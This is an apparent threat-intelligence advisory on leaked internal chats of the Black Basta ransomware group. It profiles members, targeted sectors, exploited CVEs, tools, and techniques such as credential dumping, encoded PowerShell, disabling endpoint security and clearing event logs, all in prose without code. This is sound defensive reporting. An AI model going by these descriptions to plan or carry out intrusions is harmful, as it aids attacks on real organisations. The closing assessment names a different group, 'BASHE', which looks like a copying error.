Black Basta Ransomware Group’s Leaked Internal Chat Analysis

Summary

On February 20, a Telegram user operating under the handle "ExploitWhispers" released what they claim to be an archive of internal Matrix chat logs belonging to the Black Basta ransomware group. The logs, written in Russian, reportedly detail internal communications and operational tactics.

The leak appears to have been motivated by the group's alleged targeting of Russian banks, which led to retaliation from a threat actor. The released .json file, approximately 50MB in size, contains messages exchanged within Black Basta's internal chat rooms between September 18, 2023, and September 28, 2024. The leaked archive contains a wide range of sensitive information, including phishing templates and targeted email lists, cryptocurrency wallet addresses, data drop locations, compromised credentials of victims, and confirmation of previously reported tactics and techniques.

This advisory serves as the first phase of an ongoing analysis, incorporating findings from both direct examination of the leaked files and OSINT investigations. Further updates will follow as more intelligence is gathered.

Observation and Analysis

Members of the chat

Analysis of the chat activity revealed 49 unique users present in the leaked logs. While many of them appear to have minimal activity, further correlations suggest that some are prominent operators with key roles within the group. The remaining usernames of members are indicated in the Appendix to this document. These individuals may have ties to former Conti members, indicating a possible connection between Black Basta and the now-defunct ransomware syndicate.

@usernamegg (Primary Operator)

• Coordinates ransomware deployments.

• Manages botnets, credentials, and infrastructure.

• Oversees financial transactions related to ransom payments.

• Provides access details of compromised networks.

@usernamegway (Technical Operator)

• Sets up accounts and credentials for initial access.

• Manages technical deployments (tools like Cobalt Strike, PikaBot).

• Purchases exploits & attack infrastructure on underground markets.

@lapa (Infrastructure & Exploits)

• Manages proxies and SOCKS botnets for C2 communication.

• Handles compromised IP addresses used for pivoting inside networks.

• Sets up Remote Management and Monitoring (RMM) software (like AnyDesk, Splashtop).

@cameron777 (Target Selection & Access Brokering)

• Identifies high-value targets for ransomware deployment.

• Sells access or brokers VPN/Citrix credentials.

• Scans for vulnerabilities like CVE-2024–21413, Log4Shell, etc. @nickolas (Monetization & Data Sales)

• Handles exfiltrated credentials and sensitive data.

• Sells access logs & credential dumps.

• Facilitates wallet addresses & payment processing.

@colin (Unknown Role)

• Engages in ransom negotiations with victims.

• Manages payment details and cryptocurrency wallets.

Affiliates (Various personas)

• Conduct initial access & lateral movement.

• Execute malware payloads (Formbook, Amadey, etc.).

• Use tools like Psexec, Rclone, and Meterpreter for persistence.

Victimology

We could extract names of 371 companies from the website links of company information websites such as Appollo and ZoomInfo that were shared by the Black Basta members. Ransomware group had either targeted or planned to target these companies. Presently, we are analyzing the data to identify which were compromised or subjected to attacks.

Reconnaissance on Companies: Black Basta maintains a spreadsheet of victims they're trying to target. It is shared between members, and they collaborate on it together. This company data has further mentions of names of person of interest for social engineering attacks on them, and other strategy notes. They often identify multiple targets at companies.

Victim Prioritization & Motive: Black Basta prioritizes financial viability when selecting targets, focusing on high-revenue companies rather than mass-targeting lower-value entities. Internal discussions suggest their motive that a few high-profile victims generate more revenue than widespread attacks on smaller organizations. The ransomware group emphasizes targeting companies more likely to pay ransoms, particularly those handling sensitive or critical data to maximize their profits.

The group frequently focuses on legal services, financial services, healthcare, and manufacturing sectors, as they handle sensitive information and are more likely to pay to protect client confidentiality.

While Black Basta claims to be apolitical, internal discussions suggest geopolitical and regulatory factors may influence their choice of targets. In some cases, the group leverages stolen data for secondary extortion, selling valuable intellectual property or business secrets to competitors or foreign entities. This highlights their interest in maximizing financial gains not just through ransom payments, but also by monetizing stolen data through external channels.

Vulnerabilities

The Black Basta chat logs reference 62 unique CVEs, amongst which over 85% of them were either mentioned in CISA Known Exploited Vulnerability or reported to be actively exploited. This indicates a clear preference for targeting known weaknesses, leveraging vulnerabilities that already have available exploits. The group appears to focus on widely adopted enterprise technologies, including Citrix NetScaler, Confluence Atlassian, Fortinet, Cisco, Palo Alto, CheckPoint, and Microsoft Windows, suggesting a strategic approach to maximizing impact by exploiting widely used systems.

The chat logs indicated that within days of new security advisories being issued, Black Basta members actively discussed vulnerabilities affecting several widely used products.

Black Basta target selection process is heavily vulnerability-driven, with members actively discussing specific exploits for initial access and email services. Reconnaissance efforts include scanning for domain and infrastructure weaknesses, ensuring they exploit known vulnerabilities efficiently. Additionally, accessibility plays a crucial role, with attackers leveraging exposed RDP, Citrix, VPN, or email credentials, often through brute-force attacks or credential stuffing.

Black Basta adopts an opportunistic exploitation strategy, favoring existing vulnerabilities and publicly available proof-of-concept (PoC) exploits for initial access, particularly in targeting email services. Rather than investing heavily in custom malware, the group leverages known weaknesses to gain footholds in targeted networks efficiently.

Tools

In the chats, we managed to extract 511 unique .exe files, most of which were either generated by the threat actors (TAs) or downloaded from various repositories. Additionally, we identified 131 unique malware samples, along with their associated hashes. Regarding financial activity, we uncovered 137 unique BTC wallets, though not all could be directly attributed to the TAs, as some were linked to various services they paid for.

The group makes extensive use of public tools from GitHub, integrating DirtyCLR, ElusiveMice, TeamsPhisher, and others to facilitate exploitation and persistence. Their malware arsenal consists of well-known infostealers and loaders, including Lumma, Formbook, Amadey, AgentTesla, Pika Bot, and Smoke Bot, which are deployed based on the specific operation.

Their modular C2 infrastructure is built around Cobalt Strike, Rclone, and inara.pk, with fallback mechanisms via netcat and SSH, ensuring operational resilience even in the face of security interventions.

TTPs observed

Reconnaissance

Black Basta places significant emphasis on reconnaissance, utilizing tools like ZoomEye, Censys, Shodan, and Fofa to scan for internet-exposed endpoints. This phase is critical in identifying vulnerable systems before launching an attack. Internal discussions reveal that certain members, particularly users "lapa" and "gg," are highly active in using these tools, frequently sharing scan results and analysis with the group. Their reliance on automated reconnaissance platforms suggests a strategic approach to gather pre-attack intelligence, ensuring they exploit the most accessible and high-value targets efficiently.

Initial Access

Black Basta frequently gains initial access by exploiting public-facing applications. They have actively targeted vulnerabilities in Zimbra, OWA, Cisco, Fortinet, and CheckPoint systems, leveraging known exploits such as Log4Shell to infiltrate networks. Their preference for readily available exploits aligns with their opportunistic approach to compromising exposed infrastructure.

In addition to exploiting software vulnerabilities, the group also relies on valid accounts to escalate privileges and move laterally within a network. They obtain credentials through LSASS dumping, extracting login information from compromised machines. These stolen credentials are then reused for lateral movement using tools like PsExec and RDP, enabling them to navigate through an environment stealthily and maintain persistence.

Execution

Black Basta relies on multiple execution techniques to deploy their payloads while maintaining stealth and evading detection. The group makes heavy use of PowerShell, CMD, and Windows Management Instrumentation Command-line (WMIC) as part of their command and scripting interpreter tactics. They often encode commands in Base64 to obscure their execution and evade signature-based detection. These tools allow them to perform system discovery, privilege escalation, and payload execution efficiently.

They also leverage Windows Management Instrumentation to run reconnaissance commands and execute malicious payloads. This technique is frequently combined with PowerShell and Living-offthe-Land Binaries (LOLBins) to blend in with legitimate system activity. To further avoid detection, Black Basta employs signed binary proxy execution by abusing trusted Windows executables such as rundll32, msiexec, and regsvr32. These binaries allow them to execute malicious code stealthily, bypass security controls, and maintain persistence on compromised systems.

Discovery

Black Basta engages in system information discovery by utilizing tools such as systeminfo, WMIC, and PowerShell to collect details about system configurations, domain information, and installed security solutions. The group also conducts account discovery, using PowerShell and LDAP queries to enumerate users, groups, and computer assets within Active Directory. Additionally, they perform network scanning, actively probing for open RDP, SMB, and VPN ports to identify lateral movement opportunities.

Persistence

To maintain access within compromised environments, Black Basta leverages registry run keys, adding payloads and beacons to registry keys to ensure persistence across system reboots. They also create scheduled tasks, configuring them to execute payloads at specific times or during system startup to maintain their foothold.

Command and Control (C2)

For communication with their infrastructure, the group establishes TCP connections using PowerShell sand .NET-based socket clients to interact with command-and-control (C2) servers. They also conduct ingress tool transfers, downloading malicious tools such as DirtyCLR, PoolPartyBof, and Rclone from repositories like GitHub using PowerShell and curl.

Credential Access

Black Basta focuses on stealing credentials through OS credential dumping, extracting sensitive login data by dumping process memory with Procdump and accessing credential storage in registry hives. Additionally, they use brute-force techniques, launching password spraying attacks against OWA and VPN portals, leveraging credential lists obtained during initial access.

Privilege Escalation

The group exploits known privilege escalation vulnerabilities, including security flaws like CVE-2024- 3400 (Palo Alto) and CVE-2023-36745 (Exchange), to elevate their access within targeted environments. They also create or modify system processes, using tools like PsExec and runspawn to execute tasks with elevated privileges.

Lateral Movement

Black Basta moves laterally within compromised networks using remote services, specifically leveraging SMB and Windows Admin Shares through PsExec. They also gain access to systems via Remote Desktop Protocol (RDP) by either stealing credentials or creating new administrator accounts through registry modifications.

Defense Evasion

To avoid detection, the group engages in impairing security defenses, actively disabling Windows Defender, firewalls, and endpoint security solutions such as Cortex, Sophos, and CrowdStrike using registry modifications and PowerShell commands. They also employ obfuscation techniques, encoding payloads in Base64 to evade antivirus detection by decoding them at runtime. Furthermore, they practice indicator removal on hosts, clearing Windows Event Logs using wevtutil and deleting traces of their activities post-execution to minimize forensic evidence.

Assessment of the Actor & Information

Based on the recent activities of the group, we assess the reliability of BASHE threat group as B –

Usually reliable.

Based on our overall analysis of the samples posted by the TA, we assess the credibility of the threat actor’s claims as 2 – Probably true.